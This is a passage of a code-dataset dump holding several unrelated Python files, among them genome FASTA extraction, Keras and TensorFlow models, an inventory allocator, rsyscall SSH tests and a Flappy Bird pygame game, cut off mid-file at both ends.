'>%s|%s|%s|%s|%s|%s|%s\\n' % (accession, locus_tag, protein_id, cds_name, transl_table, cds_location_nice, cds_strand)\n\t\t\t\t\t\tcds_entry += '%s\\n' % cds_sequence\n\n\t\t\t\t\t\toutput_record += cds_entry\n\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\n\treturn output_record, error_string, translation_table_4\n\ndef extract_cds(accession, table):\n\n\tif table == 11:\n\t\trecord_output_path = output_fasta_directory + accession + '.txt'\n\t\trecord_path = good_genomes + accession + '.embl'\n\telif table == 4:\n\t\trecord_output_path = output_fasta_directory_t4 + accession + '.txt'\n\t\trecord_path = t4_genomes + accession + '.embl'\n\n\n\n\ttry:\n\t\toutput_record, error_string, table4 = parse_genome(accession, record_path)\n\texcept:\n\n\t\t# Workaround for BioPython thrown up by awkward annotation\n\t\t# https://github.com/biopython/biopython/issues/341\n\n\t\tline_count = 0\n\t\tf = open(record_path, \"rU\")\n\t\tlines = f.readlines()\n\t\tf.close()\n\n\t\toutput_lines = []\n\t\tfor line in lines:\n\t\t if line.startswith('CO'):\n\t\t \toutput_lines.append(\"#\" + line)\n\t\t else:\n\t\t \toutput_lines.append(line)\n\n\t\tf = open(record_path, \"w\")\n\t\tf.write(\"\".join(output_lines))\n\t\tf.close()\n\n\t\t# Now parse the genome\n\t\toutput_record, error_string, table4 = parse_genome(accession, record_path)\n\n\treturn output_record, record_output_path, error_string, accession, table4\n\n\n\ndef write_to_file(output_record, record_output_path):\n\n\tprint ('Writing to: %s' % record_output_path)\n\n\toutput_file = open(record_output_path, 'w')\n\toutput_file.write(output_record)\n\toutput_file.close()\n\n\n\n\ndef run_genomes(accessions, acc_counts, table):\n\n\toutputs = []\n\n\tfor accession in accessions:\n\n\t\tprint ('{}: {}'.format(accession, acc_counts[accession]))\n\t\toutput_record, record_output_path, error_string, accession, table4 = extract_cds(accession, table)\n\t\toutput = [output_record, record_output_path, error_string, accession, table4]\n\n\t\toutputs.append(output)\n\n\treturn (outputs)\n\n\n\n\ndef run():\n\n\tstart_time = time.time()\t# Set the start time\n\n\tscript_misc() \t# Description\n\n\tprint('Processing good genomes')\n\n\tcreate_strict_directory(output_fasta_directory)\n\tcreate_strict_directory(output_filter_directory)\n\n\taccession_list = get_accession_list(genome_list)\n\n\taccessions = []\n\tacc_counts = {}\n\n\taccession_count = 0\n\n\tfor accession in sorted(accession_list):\n\t\taccession_count += 1\n\t\tif accession_count:\n\t\t# if accession_count <= 10:\n\t\t\taccessions.append(accession)\n\t\t\tacc_counts[accession] = accession_count\n\n\tresults = run_in_parralell(accessions, [acc_counts, 11], run_genomes)\n\n\n\terror_file = open(output_error_file_path, 'w')\n\terror_file.write('acc,locus_tag,error_code,,1=length_fail,2=non_actg,3=non_standard_stop,4=in_frame_stop\\n')\n\n\ttable_4_file = open(output_table_4_path, 'w')\n\n\tfor result in results:\n\t\toutputs = result.get()\n\t\tfor output in outputs:\n\t\t\toutput_record = output[0]\n\t\t\trecord_output_path = output[1]\n\t\t\terror_string = output[2]\n\t\t\taccession = output[3]\n\t\t\ttable4 = output[4]\n\n\t\t\twrite_to_file(output_record, record_output_path)\n\t\t\terror_file.write(error_string)\n\n\t\t\tif table4:\n\t\t\t\tline = '%s\\n' % accession\n\t\t\t\ttable_4_file.write(line)\n\n\terror_file.close()\n\ttable_4_file.close()\n\n\n\tprint('Processing good genomes')\n\n\tcreate_strict_directory(output_fasta_directory_t4)\n\taccession_list = get_accession_list(genome_list_t4)\n\n\taccessions = []\n\tacc_counts = {}\n\n\taccession_count = 0\n\n\tfor accession in sorted(accession_list):\n\t\taccession_count += 1\n\t\tif accession_count:\n\t\t\taccessions.append(accession)\n\t\t\tacc_counts[accession] = accession_count\n\n\tresults = run_in_parralell(accessions, [acc_counts, 4], run_genomes)\n\n\terror_file = open(output_error_file_path_t4, 'w')\n\terror_file.write('acc,locus_tag,error_code,,1=length_fail,2=non_actg,3=non_standard_stop,4=in_frame_stop\\n')\n\n\tfor result in results:\n\t\toutputs = result.get()\n\t\tfor output in outputs:\n\t\t\toutput_record = output[0]\n\t\t\trecord_output_path = output[1]\n\t\t\terror_string = output[2]\n\t\t\taccession = output[3]\n\t\t\ttable = output[4]\n\n\t\t\twrite_to_file(output_record, record_output_path)\n\t\t\terror_file.write(error_string)\n\n\n\terror_file.close()\n\n\n\t# Print the elapsed time\n\telapsed = time.time() - start_time\n\tprint (str(timedelta(seconds=elapsed)))\n\n\n###############\n# Run script #\n###############\n\nif __name__ == \"__main__\":\n\trun()\n","sub_path":"scripts/3_parse_genomes/embl_to_fasta.py","file_name":"embl_to_fasta.py","file_ext":"py","file_size_in_byte":12297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"255641814","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom keras import layers, models\nfrom tfmiss.keras.layers import TemporalConvNet\n\n\nclass MnistModel(models.Model):\n CORE_GRU = 'GRU'\n CORE_LSTM = 'LSTM'\n CORE_TCN = 'TCN'\n CORE_TCN_HE = 'TCN_HE'\n\n def __init__(self, core, filters, kernel_size, dropout):\n inputs = layers.Input(shape=(28 * 28, 1))\n\n if self.CORE_GRU == core:\n sequence = layers.GRU(units=filters[0], dropout=dropout, return_sequences=True)\n elif self.CORE_LSTM == core:\n sequence = layers.LSTM(units=filters[0], dropout=dropout, return_sequences=True)\n elif self.CORE_TCN == core:\n sequence = TemporalConvNet(filters=filters, kernel_size=kernel_size, dropout=dropout)\n else:\n if not self.CORE_TCN_HE == core:\n raise ValueError('Wrong \"core\" value')\n sequence = TemporalConvNet(\n filters=filters, kernel_size=kernel_size, dropout=dropout, kernel_initializer='he_uniform')\n\n last = layers.Lambda(lambda x: x[:, -1, :])\n predict = layers.Dense(10, activation='softmax') # Digits 0 - 9\n\n outputs = sequence(inputs)\n outputs = last(outputs)\n outputs = predict(outputs)\n\n super(MnistModel, self).__init__(inputs=inputs, outputs=outputs)\n","sub_path":"examples/tcn/mnist_pixel/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"34202991","text":"\"\"\"\r\nObject to process an order based on the warehouses it can ship from.\r\nIf an empty list is returned, the order could not be completed.\r\n\r\n@author: Laurel Dernbach\r\n@date: August 27, 2020\r\n\"\"\"\r\n\r\n\r\nclass InventoryAllocator(object):\r\n def __init__(self, order, inventory):\r\n self.order = order # map {product:quantity}\r\n self.inventory = inventory # list of WarehouseObjects\r\n\r\n def allocate(self):\r\n allocation = {}\r\n # \"copy\" the warehouse inventory information to restore in the case of a failed order\r\n for warehouse in self.inventory:\r\n warehouse.hold()\r\n for product in self.order:\r\n quantity_needed = self.order[product]\r\n for warehouse in self.inventory:\r\n # move onto next product in order\r\n if quantity_needed == 0:\r\n break\r\n if product in warehouse.inventory:\r\n # no need to split product across warehouses\r\n if quantity_needed <= warehouse.inventory[product]:\r\n warehouse.inventory[product] -= quantity_needed\r\n if warehouse.name in allocation:\r\n allocation[warehouse.name].append({product: quantity_needed})\r\n else:\r\n allocation[warehouse.name] = [{product: quantity_needed}]\r\n quantity_needed = 0\r\n # attempt to split across warehouses\r\n else:\r\n if warehouse.inventory[product] > 0:\r\n quantity_needed -= warehouse.inventory[product]\r\n if warehouse.name in allocation:\r\n allocation[warehouse.name].append({product: warehouse.inventory[product]})\r\n else:\r\n allocation[warehouse.name] = [{product: warehouse.inventory[product]}]\r\n warehouse.inventory[product] = 0\r\n if quantity_needed > 0:\r\n print(\"ERROR: not enough inventory\")\r\n # restore original inventory before order fails\r\n for warehouse in self.inventory:\r\n warehouse.restore()\r\n return []\r\n\r\n return allocation\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"trackingcode-data-processor/src/InventoryAllocator.py","file_name":"InventoryAllocator.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"346865637","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 24 20:16:24 2020\r\n\r\n@author: quann\r\n\"\"\"\r\n\r\nh=int(input(\"Số lần lặp của thông báo = \"))\r\nimport time\r\nimport os \r\nwhile h>0:\r\n a=input(\"Bạn có muốn tắt máy hay không ? (có/không): \")\r\n if a=='có':\r\n os.system(\"shutdown /s /t 1\") \r\n else : \r\n time.sleep(30)\r\n\r\n","sub_path":"bài tập 9.py","file_name":"bài tập 9.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"177074479","text":"import tensorflow as tf\nimport numpy as np\nfrom collections import defaultdict\nfrom rbm import RBM\nfrom dataset import load_dataset\nfrom utils import chunker, revert_expected_value, expand, iteration_str\nimport sys\nfrom math import sqrt\n\ntf.flags.DEFINE_integer(\"epochs\", 100, \"\")\ntf.flags.DEFINE_integer(\"batch_size\", 10, \"\")\ntf.flags.DEFINE_integer(\"num_hidden\", 100, \"\")\ntf.flags.DEFINE_float(\"decay\", 0.01, \"\")\ntf.flags.DEFINE_float(\"momentum\", 0.9, \"\")\ntf.flags.DEFINE_float(\"l_v\", 0.01, \"\")\ntf.flags.DEFINE_float(\"l_w\", 0.01, \"\")\ntf.flags.DEFINE_float(\"l_h\", 0.01, \"\")\ntf.flags.DEFINE_string(\"train_path\", \"ml-100k/u1.base\", \"\")\ntf.flags.DEFINE_string(\"test_path\", \"ml-100k/u1.test\", \"\")\ntf.flags.DEFINE_string(\"sep\", \"\\t\", \"\")\nFLAGS = tf.flags.FLAGS\n\n\nif __name__ == \"__main__\":\n all_users, all_movies, tests = load_dataset(FLAGS.train_path, FLAGS.test_path,\n FLAGS.sep, user_based=True)\n rbm = RBM(len(all_movies) * 5, FLAGS.num_hidden)\n print(\"model created\")\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n profiles = defaultdict(list)\n with open(FLAGS.train_path, 'rt') as data:\n for i, line in enumerate(data):\n uid, mid, rat, timstamp = line.strip().split(FLAGS.sep)\n profiles[uid].append((mid, float(rat)))\n print(\"Users and ratings loaded\")\n for e in range(FLAGS.epochs):\n \n for batch_i, batch in enumerate(chunker(list(profiles.keys()),\n FLAGS.batch_size)):\n size = min(len(batch), FLAGS.batch_size)\n \n # create needed binary vectors\n bin_profiles = {}\n masks = {}\n for userid in batch:\n user_profile = np.array([0.] * len(all_movies))\n mask = [0] * (len(all_movies) * 5)\n for movie_id, rat in profiles[userid]:\n user_profile[all_movies.index(movie_id)] = rat\n for _i in range(5):\n mask[5 * all_movies.index(movie_id) + _i] = 1\n example = expand(np.array([user_profile])).astype('float32')\n bin_profiles[userid] = example\n masks[userid] = mask\n\n profile_batch = [bin_profiles[el] for el in batch]\n masks_batch = [masks[id] for id in batch]\n train_batch = np.array(profile_batch).reshape(size,\n len(all_movies * 5))\n train_masks = np.array(masks_batch).reshape(size,\n len(all_movies) * 5)\n _ = sess.run([rbm.optimizer], feed_dict={rbm.input: train_batch, rbm.mask : masks_batch})\n sys.stdout.write('.')\n sys.stdout.flush()\n \n # test step\n ratings = []\n predictions = []\n for batch in chunker(list(tests.keys()), FLAGS.batch_size):\n size = min(len(batch), FLAGS.batch_size)\n\n # create needed binary vectors\n bin_profiles = {}\n masks = {}\n for userid in batch:\n user_profile = [0.] * len(all_movies)\n mask = [0] * (len(all_movies) * 5)\n for movie_id, rat in profiles[userid]:\n user_profile[all_movies.index(movie_id)] = rat\n for _i in range(5):\n mask[5 * all_movies.index(movie_id) + _i] = 1\n example = expand(np.array([user_profile])).astype('float32')\n bin_profiles[userid] = example\n masks[userid] = mask\n\n positions = {profile_id: pos for pos, profile_id\n in enumerate(batch)}\n profile_batch = [bin_profiles[el] for el in batch]\n test_batch = np.array(profile_batch).reshape(size,\n len(all_movies * 5))\n predict = sess.run(rbm.predict, feed_dict={rbm.input : test_batch})\n user_preds = revert_expected_value(predict)\n \n for profile_id in batch:\n test_movies = tests[profile_id]\n try:\n for movie, rating in test_movies:\n current_profile = user_preds[positions[profile_id]]\n predicted = current_profile[all_movies.index(movie)]\n rating = float(rating)\n ratings.append(rating)\n predictions.append(predicted)\n except Exception:\n pass\n\n vabs = np.vectorize(abs)\n distances = np.array(ratings) - np.array(predictions)\n\n mae = vabs(distances).mean()\n rmse = sqrt((distances ** 2).mean())\n print(\"\\nepoch: {}, mae/rmse: {}/{}\".format(e, mae, rmse))\n","sub_path":"83. Restricted Boltzmann Machines for Collaborative Filtering in Tensorflow/user_based_run.py","file_name":"user_based_run.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"249817006","text":"from flask_restx import Api, fields\n\nfrom sledilnik.classes.Point import Point\n\n\nclass Field:\n def __init__(self, top_left: Point, top_right: Point, bottom_right: Point, bottom_left: Point):\n self.top_left: Point = top_left\n self.top_right: Point = top_right\n self.bottom_right: Point = bottom_right\n self.bottom_left: Point = bottom_left\n\n def to_json(self):\n return {\n \"top_left\": self.top_left.to_json(),\n \"top_right\": self.top_right.to_json(),\n \"bottom_right\": self.bottom_right.to_json(),\n \"bottom_left\": self.bottom_left.to_json()\n }\n\n def to_tuple(self) -> tuple:\n return (\n self.top_left.to_tuple(),\n self.top_right.to_tuple(),\n self.bottom_right.to_tuple(),\n self.bottom_left.to_tuple()\n )\n\n @classmethod\n def to_model(cls, api: Api):\n return api.model('Field', {\n 'top_left': fields.Nested(Point.to_model(api), required=True),\n 'top_right': fields.Nested(Point.to_model(api), required=True),\n 'bottom_right': fields.Nested(Point.to_model(api), required=True),\n 'bottom_left': fields.Nested(Point.to_model(api), required=True),\n })\n","sub_path":"sledilnik/classes/Field.py","file_name":"Field.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"325598987","text":"import random\n\nimport dimod\nimport optneal as opn\nfrom openjij import SASampler\n\n\ndef main():\n \"\"\" Example of K-hot problem \"\"\"\n N = 12\n K = 10\n numbers = [random.uniform(0, 5) for _ in range(N)]\n print(sorted(numbers))\n\n cost_dict = {i: numbers[i] for i in range(N)}\n cost = opn.Cost(cost_dict, shape=N)\n\n constraints = [({i: 1 for i in range(N)}, K)]\n penalty = opn.Penalty(constraints, shape=N)\n\n lam = 5.0\n cost_func = cost + lam * penalty.normalize()\n # bqm = cost_func.to_dimod_bqm()\n Q, _ = cost_func.to_qubo()\n\n cost_func.show_qubo()\n\n sa_sampler = SASampler()\n # lagrex_sampler = opn.LagrangeRelaxSampler(sa_sampler)\n # sampleset = lagrex_sampler.sample(bqm, num_reads=10)\n sampleset = sa_sampler.sample_qubo(Q, num_reads=10)\n\n # solver = dimod.ExactSolver()\n # results = solver.sample(bqm)\n\n # for sample in results.lowest().samples():\n # print([numbers[k] for k, v in sample.items() if v == 1])\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/ex_khot.py","file_name":"ex_khot.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"652312706","text":"#!/usr/bin/env python3\n# encoding: utf-8\nimport numpy as np\n\nclass NG(object):\n \"\"\"\n Normalized Gradient Descent learner.\n As per Ross,Mineiro,Langford: \"Normalized Online Learning\" (UAI2013)\n Works only with LinearModel\n \"\"\"\n\n def __init__(self, model, loss, eta, verbose=False):\n self.model=model\n assert model.__class__.__name__=='LinearModel'\n self.loss=loss\n self.grad_loss=lambda x,y:self.loss.grad_loss(x,y)\n self.eta=eta\n self.verbose=verbose\n self.n=1\n self.s=np.zeros(model.dim)\n self.N=0\n\n def predict(self, x):\n return self.model.predict(x)\n\n def verbose(func):\n def wrap(self,x,y):\n if self.verbose:\n print(self.model.get_param_vector())\n print(self.eta*self.grad_loss(x,y))\n ret = func(self,x,y)\n if self.verbose:\n print(\"gradient descent step with fixed eta: gradient l2 norm is %s\"\n %(-self.eta*np.dot(self.grad_loss(x,y),self.grad_loss(x,y))))\n return ret\n return wrap\n\n @verbose\n def fit(self, x,y):\n w=self.model.get_param_vector()\n for i in range(0,self.model.dim):\n if np.abs(x[i])>self.s[i]:\n w[i]=w[i]*self.s[i]*self.s[i]/(x[i]*x[i])\n self.s[i]=np.abs(x[i])\n self.N=self.N+np.sum(x*x/(self.s*self.s))\n self.model.set_param_vector(w)\n G=self.loss.d_loss_directional(x,y,i)\n\n for i in range(0,self.model.dim):\n w[i]=w[i] - self.eta*self.n*self.loss.d_loss_directional(x,y,i)/(self.N*self.s[i]*self.s[i])\n self.n+=1\n\n self.model.set_param_vector(w)\n","sub_path":"algos/ng.py","file_name":"ng.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"225712718","text":"from __future__ import annotations\n\nfrom rsyscall.trio_test_case import TrioTestCase\nimport rsyscall.thread\nfrom rsyscall.nix import local_store, enter_nix_container\nfrom rsyscall.misc import bash_nixdep, coreutils_nixdep, hello_nixdep\nfrom rsyscall.tasks.ssh import *\nimport rsyscall.tasks.local as local\n\nfrom rsyscall.unistd import SEEK\nfrom rsyscall.signal import Sigset, HowSIG\nfrom rsyscall.sys.memfd import MFD\n\nfrom rsyscall.handle import FileDescriptor\nfrom rsyscall.path import Path\nfrom rsyscall.thread import Thread, Command\nfrom rsyscall.command import Command\nfrom rsyscall.monitor import AsyncChildProcess\n\n# import logging\n# logging.basicConfig(level=logging.DEBUG)\n\nasync def start_cat(thread: Thread, cat: Command,\n stdin: FileDescriptor, stdout: FileDescriptor) -> AsyncChildProcess:\n thread = await thread.fork()\n await thread.unshare_files_and_replace({\n thread.stdin: stdin,\n thread.stdout: stdout,\n })\n child = await thread.exec(cat)\n return child\n\nclass TestSSH(TrioTestCase):\n async def asyncSetUp(self) -> None:\n self.local = local.thread\n self.store = local_store\n self.host = await make_local_ssh(self.local, self.store)\n self.local_child, self.remote = await self.host.ssh(self.local)\n\n async def asyncTearDown(self) -> None:\n await self.local_child.kill()\n\n async def test_read(self) -> None:\n [(local_sock, remote_sock)] = await self.remote.open_channels(1)\n data = b\"hello world\"\n await local_sock.write(await self.local.ram.ptr(data))\n valid, _ = await remote_sock.read(await self.remote.ram.malloc(bytes, len(data)))\n self.assertEqual(len(data), valid.size())\n self.assertEqual(data, await valid.read())\n\n async def test_exec_true(self) -> None:\n bash = await self.store.bin(bash_nixdep, \"bash\")\n await self.remote.run(bash.args('-c', 'true'))\n\n async def test_exec_pipe(self) -> None:\n [(local_sock, remote_sock)] = await self.remote.open_channels(1)\n cat = await self.store.bin(coreutils_nixdep, \"cat\")\n thread = await self.remote.fork()\n await thread.unshare_files_and_replace({\n thread.stdin: remote_sock,\n thread.stdout: remote_sock,\n })\n child_process = await thread.exec(cat)\n\n in_data = await self.local.ram.ptr(b\"hello\")\n written, _ = await local_sock.write(in_data)\n valid, _ = await local_sock.read(written)\n self.assertEqual(in_data.value, await valid.read())\n\n async def test_fork(self) -> None:\n thread1 = await self.remote.fork()\n async with thread1:\n thread2 = await thread1.fork()\n await thread2.close()\n\n async def test_nest(self) -> None:\n local_child, remote = await self.host.ssh(self.remote)\n await local_child.kill()\n\n async def test_copy(self) -> None:\n cat = await self.store.bin(coreutils_nixdep, \"cat\")\n\n local_file = await self.local.task.memfd_create(await self.local.ram.ptr(Path(\"source\")))\n remote_file = await self.remote.task.memfd_create(await self.remote.ram.ptr(Path(\"dest\")))\n\n data = b'hello world'\n await local_file.write(await self.local.ram.ptr(data))\n await local_file.lseek(0, SEEK.SET)\n\n [(local_sock, remote_sock)] = await self.remote.open_channels(1)\n\n local_child = await start_cat(self.local, cat, local_file, local_sock)\n await local_sock.close()\n\n remote_child = await start_cat(self.remote, cat, remote_sock, remote_file)\n await remote_sock.close()\n\n await local_child.check()\n await remote_child.check()\n\n await remote_file.lseek(0, SEEK.SET)\n read, _ = await remote_file.read(await self.remote.ram.malloc(bytes, len(data)))\n self.assertEqual(await read.read(), data)\n\n async def test_sigmask_bug(self) -> None:\n thread = await self.remote.fork()\n await thread.unshare_files(going_to_exec=True)\n await rsyscall.thread.do_cloexec_except(\n thread, set([fd.near for fd in thread.task.fd_handles]))\n await self.remote.task.sigprocmask((HowSIG.SETMASK,\n await self.remote.ram.ptr(Sigset())),\n await self.remote.ram.malloc(Sigset))\n await self.remote.task.read_oldset_and_check()\n\n async def test_nix_deploy(self) -> None:\n # make it locally so that it can be cleaned up even when the\n # remote enters the container\n tmpdir = await self.local.mkdtemp()\n async with tmpdir:\n store = await enter_nix_container(local_store, self.remote, tmpdir.path)\n hello = await store.bin(hello_nixdep, \"hello\")\n await self.remote.run(hello)\n","sub_path":"python/rsyscall/tests/test_ssh.py","file_name":"test_ssh.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"584500919","text":"# Author: Kamil Woźniak\n# Student ID: 303183\n# Email: jestem.kamil.wozniak@gmail.com\n# GitHub: https://github.com/Valaraucoo/flappybird\n\nimport pygame,random,os,time\nfrom gameobjects import Bird,Wall,Button\n\n\nclass Game():\n\n def __init__(self,game_name , screen_width , screen_height,intro):\n\n\n # ============= GAME DISPLAY CONFIG =============#\n self.SCREEN_WIDTH,self.SCREEN_HEIGHT = screen_width,screen_height\n\n self.BACKGROUND = pygame.image.load(os.path.join('images','bg2.png'))\n self.BACKGROUND_X = intro.BACKGROUND_X\n\n\n self.FPS_MAX = 60\n\n #GAME & MUSIC INIT\n pygame.mixer.init()\n pygame.mixer.pre_init()\n pygame.init()\n self.WINDOW = pygame.display.set_mode((self.SCREEN_WIDTH, self.SCREEN_HEIGHT))\n pygame.display.set_caption(game_name)\n\n self.MUSIC = intro.MUSIC\n\n\n #TICKS AND LOOP CONFIG\n self.LOOP = intro.GAME_LOOP\n self.FPS_CLOCK = pygame.time.Clock()\n self.FPS_DELTA = 0\n\n\n self.BIRD = Bird(self,100,50)\n self.WALLS = [Wall(self,1000,500,250,5)]\n\n self.score = 0\n self.i = 0\n\n\n\n\n self.music_ding = pygame.mixer.Sound(os.path.join('music','316798__grey24__flyffnotif.wav'))\n self.counter = 0\n self.couter_MAX = 120\n\n #============= MAIN LOOP =============#\n\n self.main_loop()\n self.SCORE = self.score\n\n\n\n\n\n def main_loop(self):\n while self.LOOP:\n pygame.time.delay(5)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.LOOP = False\n\n self.FPS_DELTA += self.FPS_CLOCK.tick() / 1000\n while self.FPS_DELTA > 1 / self.FPS_MAX:\n self.tick()\n self.FPS_DELTA -= 1 / self.FPS_MAX\n\n self.WINDOW.fill((0,0,0))\n self.WINDOW.blit(self.BACKGROUND, (self.BACKGROUND_X, 0))\n\n self.draw()\n\n if self.BACKGROUND_X <= -1280 :\n self.BACKGROUND_X = 0\n self.BACKGROUND_X -= 2\n\n\n pygame.display.update()\n\n def tick(self):\n self.BIRD.tick()\n for wall in self.WALLS:\n wall.tick()\n if wall.x + wall.width <= 0:\n self.WALLS.remove(wall)\n\n if (self.BIRD.x + self.BIRD.lenght >= wall.x and self.BIRD.y > wall.y + wall.hole ):\n self.LOOP = False\n\n elif ((wall.x<=self.BIRD.x + self.BIRD.lenght <= wall.x + wall.width) and (self.BIRD.y < wall.y - wall.hole)):\n self.LOOP = False\n elif ((wall.x<=self.BIRD.x + self.BIRD.lenght <= wall.x + wall.width) and ((self.BIRD.y + self.BIRD.lenght > wall.y)or (self.BIRD.y > wall.y))):\n self.LOOP = False\n\n if (wall.x + wall.width - 20== self.BIRD.x ):\n if self.MUSIC:\n self.music_ding.play()\n self.score += 1\n\n if (self.BIRD.y + self.BIRD.lenght >= self.SCREEN_HEIGHT) or (self.BIRD.y <= 0):\n self.LOOP = False\n if self.counter == self.couter_MAX :\n self.create_new_wall()\n self.counter = 0\n\n\n self.counter += 1\n\n\n\n\n def draw(self):\n self.BIRD.draw()\n for wall in self.WALLS:\n wall.draw()\n self.score_display()\n\n def create_new_wall(self):\n if self.score >= 10 and self.score < 20:\n h = random.randint(150,280)\n elif self.score >= 20:\n h = random.randint(140,260)\n else:\n h = random.randint(160,300)\n y = random.randint(50+h, self.SCREEN_HEIGHT - 50)\n\n self.v = 5\n self.WALLS.append(Wall(self,self.SCREEN_WIDTH,y,h,self.v))\n\n def score_display(self):\n\n font = pygame.font.Font(os.path.join('fonts','04B_19__.ttf'), 80)\n font2 = pygame.font.Font(os.path.join('fonts','04B_19__.ttf'), 95)\n scoretext = font.render( str(self.score), 1, (255, 255, 255))\n scoretext2 = font2.render( str(self.score), 1, (0, 0, 0))\n self.WINDOW.blit(scoretext2, (self.SCREEN_WIDTH // 2 - 24, 5 ))\n self.WINDOW.blit(scoretext,(self.SCREEN_WIDTH // 2 - 20 , 10))\n\n\n\nclass GameIntro(object):\n\n def __init__(self,game_name , screen_width , screen_height):\n\n self.game_name = game_name\n self.SCREEN_WIDTH, self.SCREEN_HEIGHT = screen_width, screen_height\n pygame.mixer.pre_init()\n pygame.init()\n self.WINDOW = pygame.display.set_mode((self.SCREEN_WIDTH, self.SCREEN_HEIGHT))\n pygame.display.set_caption(game_name)\n\n self.BACKGROUND = pygame.image.load(os.path.join('images','bg2.png'))\n self.BACKGROUND_X = 0\n\n self.LOOP = True\n self.BUTTONS = [Button(self,490,200,300,100,(0,179, 140),(20,179, 100),'START',80 ),\n Button(self,490,320,300,100,(0,179,140),(20,179,100),'EXIT',100),\n Button(self,490,440,300,100,(0,179,140),(20,179,100),'MUSIC',80)]\n self.GAME_LOOP = True\n self.END_LOOP = True\n\n self.MUSIC = True\n\n self.LOGO = pygame.image.load(os.path.join('images', 'logo2.png'))\n\n while self.LOOP:\n pygame.time.delay(5)\n\n\n self.intro_tick()\n\n self.WINDOW.fill((0, 0, 0))\n self.WINDOW.blit(self.BACKGROUND, (self.BACKGROUND_X, 0))\n if self.BACKGROUND_X <= -1280 :\n self.BACKGROUND_X = 0\n\n self.BACKGROUND_X -= 2\n self.intro_draw()\n pygame.display.update()\n\n\n\n\n def intro_tick(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.LOOP = False\n self.GAME_LOOP = False\n self.END_LOOP = False\n elif event.type == pygame.MOUSEBUTTONUP:\n self.pos = pygame.mouse.get_pos()\n for button in self.BUTTONS:\n if (button.x <= self.pos[0] <= button.x + button.width) and (button.y <=self.pos[1]<= button.y + button.height):\n button.action()\n elif event.type == pygame.MOUSEMOTION:\n self.pos = pygame.mouse.get_pos()\n for button in self.BUTTONS:\n if (button.x <= self.pos[0] <= button.x + button.width) and (button.y <=self.pos[1]<= button.y + button.height):\n button.HOVER = True\n else:\n button.HOVER = False\n\n\n else:\n KEYS = pygame.key.get_pressed()\n if KEYS[pygame.K_SPACE] :\n self.LOOP = False\n\n\n\n def intro_draw(self):\n\n self.WINDOW.blit(self.LOGO,(0,-30))\n\n for button in self.BUTTONS:\n button.draw()\n\n\nclass EndScreen(object):\n def __init__(self,game_name , screen_width , screen_height,game,intro):\n\n self.game_name = game_name\n self.game = game\n self.intro = intro\n self.SCREEN_WIDTH, self.SCREEN_HEIGHT = screen_width, screen_height\n pygame.mixer.pre_init()\n pygame.init()\n\n self.MUSIC = intro.MUSIC\n\n self.WINDOW = pygame.display.set_mode((self.SCREEN_WIDTH, self.SCREEN_HEIGHT))\n pygame.display.set_caption(game_name)\n\n self.BACKGROUND = pygame.image.load(os.path.join('images','bg2.png'))\n self.BACKGROUND_X = self.game.BACKGROUND_X\n\n self.LOOP = self.intro.END_LOOP\n self.BUTTONS = [Button(self,490,600,300,100,(0,179,140),(20,179,100),'EXIT',100),Button(self,490,480,300,100,(0,179,140),(20,179,100),'TRY AGAIN',40)]\n\n\n self.TRY_AGAIN = False\n\n with open(os.path.join('highscores','highscores.txt'),'r+') as file:\n self.highscores = file.read().split(',')\n self.highscores = sorted([int(i) for i in self.highscores],key=lambda x:-x)\n\n\n while self.LOOP:\n pygame.time.delay(5)\n\n\n self.tick()\n\n self.WINDOW.fill((0, 0, 0))\n self.WINDOW.blit(self.BACKGROUND, (self.BACKGROUND_X, 0))\n if self.BACKGROUND_X <= -1280 :\n self.BACKGROUND_X = 0\n\n self.BACKGROUND_X -= 2\n self.draw()\n pygame.display.update()\n\n if self.game.SCORE > self.highscores[-1]:\n with open(os.path.join('highscores','highscores.txt'),'a+') as file:\n file.write(',' + str(self.game.SCORE))\n self.highscores.append(self.game.SCORE)\n self.highscores = sorted([int(i) for i in self.highscores], key=lambda x: -x)\n\n def tick(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.LOOP = False\n\n elif event.type == pygame.MOUSEBUTTONUP:\n self.pos = pygame.mouse.get_pos()\n for button in self.BUTTONS:\n if (button.x <= self.pos[0] <= button.x + button.width) and (button.y <=self.pos[1]<= button.y + button.height):\n button.action()\n elif event.type == pygame.MOUSEMOTION:\n self.pos = pygame.mouse.get_pos()\n for button in self.BUTTONS:\n if (button.x <= self.pos[0] <= button.x + button.width) and (button.y <=self.pos[1]<= button.y + button.height):\n button.HOVER = True\n else:\n button.HOVER = False\n else:\n KEYS = pygame.key.get_pressed()\n if KEYS[pygame.K_SPACE] :\n self.TRY_AGAIN = True\n self.LOOP = False\n pygame.mixer.Sound(os.path.join('music', '316798__grey24__flyffnotif.wav')).play()\n\n\n\n\n def draw(self):\n for button in self.BUTTONS:\n button.draw()\n self.score_display()\n\n def score_display(self):\n font = 